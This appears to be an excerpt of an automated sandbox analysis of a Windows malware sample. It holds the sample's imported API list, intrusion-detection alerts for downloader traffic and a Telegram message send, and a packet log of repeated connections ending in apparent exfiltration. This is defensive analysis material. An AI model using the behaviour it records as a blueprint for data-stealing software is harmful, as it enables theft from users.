                                                                                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishGreat Britain
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-10T22:13:36.248694+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849704193.122.130.080TCP
                                                                                                              2025-01-10T22:13:37.733222+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849704193.122.130.080TCP
                                                                                                              2025-01-10T22:13:38.298023+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849706104.21.80.1443TCP
                                                                                                              2025-01-10T22:13:38.842442+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849707193.122.130.080TCP
                                                                                                              2025-01-10T22:13:39.951861+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849709193.122.130.080TCP
                                                                                                              2025-01-10T22:13:41.639770+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849712104.21.80.1443TCP
                                                                                                              2025-01-10T22:13:46.038913+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849721104.21.80.1443TCP
                                                                                                              2025-01-10T22:13:46.957061+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.849723149.154.167.220443TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 10, 2025 22:13:35.593903065 CET4970480192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:35.598692894 CET8049704193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:35.598773003 CET4970480192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:35.599004030 CET4970480192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:35.603810072 CET8049704193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:36.079662085 CET8049704193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:36.091152906 CET4970480192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:36.095993042 CET8049704193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:36.197774887 CET8049704193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:36.248693943 CET4970480192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:36.572647095 CET49705443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:36.572690010 CET44349705104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:36.572798967 CET49705443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:36.713984966 CET49705443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:36.714011908 CET44349705104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:37.182739973 CET44349705104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:37.182893038 CET49705443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:37.212749958 CET49705443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:37.212771893 CET44349705104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:37.213310003 CET44349705104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:37.264338017 CET49705443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:37.307508945 CET49705443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:37.351344109 CET44349705104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:37.510066032 CET44349705104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:37.510231018 CET44349705104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:37.510309935 CET49705443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:37.542222977 CET49705443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:37.573887110 CET4970480192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:37.580570936 CET8049704193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:37.683274984 CET8049704193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:37.685983896 CET49706443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:37.686041117 CET44349706104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:37.686105967 CET49706443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:37.686933041 CET49706443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:37.686953068 CET44349706104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:37.733222008 CET4970480192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:38.150868893 CET44349706104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:38.169939995 CET49706443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:38.169975996 CET44349706104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:38.298115969 CET44349706104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:38.298285007 CET44349706104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:38.298336983 CET49706443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:38.298851013 CET49706443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:38.302047014 CET4970480192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:38.303307056 CET4970780192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:38.307614088 CET8049704193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:38.307661057 CET4970480192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:38.308149099 CET8049707193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:38.308216095 CET4970780192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:38.308370113 CET4970780192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:38.313200951 CET8049707193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:38.799928904 CET8049707193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:38.801861048 CET49708443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:38.801908016 CET44349708104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:38.801983118 CET49708443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:38.802387953 CET49708443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:38.802408934 CET44349708104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:38.842442036 CET4970780192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:39.259435892 CET44349708104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:39.261722088 CET49708443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:39.261753082 CET44349708104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:39.419291019 CET44349708104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:39.419368982 CET44349708104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:39.419425011 CET49708443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:39.420083046 CET49708443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:39.423620939 CET4970780192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:39.424899101 CET4970980192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:39.428582907 CET8049707193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:39.428644896 CET4970780192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:39.429657936 CET8049709193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:39.429739952 CET4970980192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:39.429843903 CET4970980192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:39.434560061 CET8049709193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:39.911894083 CET8049709193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:39.913228035 CET49710443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:39.913356066 CET44349710104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:39.913482904 CET49710443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:39.913753033 CET49710443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:39.913796902 CET44349710104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:39.951860905 CET4970980192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:40.368562937 CET44349710104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:40.370343924 CET49710443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:40.370373011 CET44349710104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:40.526365995 CET44349710104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:40.526438951 CET44349710104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:40.526550055 CET49710443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:40.527158976 CET49710443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:40.534658909 CET4971180192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:40.539515018 CET8049711193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:40.539618969 CET4971180192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:40.539737940 CET4971180192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:40.544496059 CET8049711193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:41.009404898 CET8049711193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:41.012231112 CET49712443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:41.012265921 CET44349712104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:41.012325048 CET49712443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:41.012593031 CET49712443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:41.012607098 CET44349712104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:41.061225891 CET4971180192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:41.486779928 CET44349712104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:41.488579035 CET49712443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:41.488596916 CET44349712104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:41.639899015 CET44349712104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:41.640101910 CET44349712104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:41.640203953 CET49712443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:41.641083956 CET49712443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:41.647995949 CET4971180192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:41.649200916 CET4971380192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:41.653163910 CET8049711193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:41.653228998 CET4971180192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:41.654531002 CET8049713193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:41.654659986 CET4971380192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:41.654685020 CET4971380192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:41.659434080 CET8049713193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:42.112885952 CET8049713193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:42.114234924 CET49714443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:42.114279032 CET44349714104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:42.114640951 CET49714443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:42.114641905 CET49714443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:42.114676952 CET44349714104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:42.154952049 CET4971380192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:42.577699900 CET44349714104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:42.579637051 CET49714443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:42.579668045 CET44349714104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:42.736644983 CET44349714104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:42.736715078 CET44349714104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:42.736767054 CET49714443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:42.737515926 CET49714443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:42.741036892 CET4971380192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:42.742302895 CET4971580192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:42.747172117 CET8049713193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:42.747334003 CET4971380192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:42.747396946 CET8049715193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:42.747493982 CET4971580192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:42.748915911 CET4971580192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:42.754195929 CET8049715193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:43.228657007 CET8049715193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:43.230003119 CET49716443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:43.230038881 CET44349716104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:43.230096102 CET49716443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:43.230432987 CET49716443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:43.230447054 CET44349716104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:43.280034065 CET4971580192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:43.686419964 CET44349716104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:43.688397884 CET49716443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:43.688436985 CET44349716104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:43.840828896 CET44349716104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:43.840894938 CET44349716104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:43.840969086 CET49716443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:43.841419935 CET49716443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:43.844871044 CET4971580192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:43.846009016 CET4971780192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:43.849838018 CET8049715193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:43.850873947 CET8049717193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:43.850893021 CET4971580192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:43.850945950 CET4971780192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:43.851037025 CET4971780192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:43.855725050 CET8049717193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:44.326091051 CET8049717193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:44.327836037 CET49718443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:44.327929974 CET44349718104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:44.328036070 CET49718443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:44.329085112 CET49718443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:44.329118013 CET44349718104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:44.373806000 CET4971780192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:44.808121920 CET44349718104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:44.809742928 CET49718443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:44.809812069 CET44349718104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:44.958467007 CET44349718104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:44.958551884 CET44349718104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:44.958777905 CET49718443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:44.959032059 CET49718443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:44.962075949 CET4971780192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:44.963248014 CET4972080192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:44.967016935 CET8049717193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:44.967067003 CET4971780192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:44.968015909 CET8049720193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:44.968067884 CET4972080192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:44.968206882 CET4972080192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:44.972964048 CET8049720193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:45.424164057 CET8049720193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:45.425369024 CET49721443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:45.425411940 CET44349721104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:45.425498962 CET49721443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:45.425728083 CET49721443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:45.425743103 CET44349721104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:45.467466116 CET4972080192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:45.896505117 CET44349721104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:45.900239944 CET49721443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:45.900260925 CET44349721104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:46.038957119 CET44349721104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:46.039019108 CET44349721104.21.80.1192.168.2.8
                                                                                                              Jan 10, 2025 22:13:46.039164066 CET49721443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:46.039587021 CET49721443192.168.2.8104.21.80.1
                                                                                                              Jan 10, 2025 22:13:46.073461056 CET4972080192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:46.079576015 CET8049720193.122.130.0192.168.2.8
                                                                                                              Jan 10, 2025 22:13:46.079632998 CET4972080192.168.2.8193.122.130.0
                                                                                                              Jan 10, 2025 22:13:46.082524061 CET49723443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 22:13:46.082545996 CET44349723149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 22:13:46.082649946 CET49723443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 22:13:46.083091974 CET49723443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 22:13:46.083102942 CET44349723149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 22:13:46.715466022 CET44349723149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 22:13:46.715544939 CET49723443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 22:13:46.717647076 CET49723443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 22:13:46.717652082 CET44349723149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 22:13:46.717937946 CET44349723149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 22:13:46.719501972 CET49723443192.168.2.8149.154.167.220
                                                                                                              Jan 10, 2025 22:13:46.763325930 CET44349723149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 22:13:46.957082033 CET44349723149.154.167.220192.168.2.8
                                                                                                              Jan 10, 2025 22:13:46.957148075 CET44349723149.154.167.220192.168.2.8
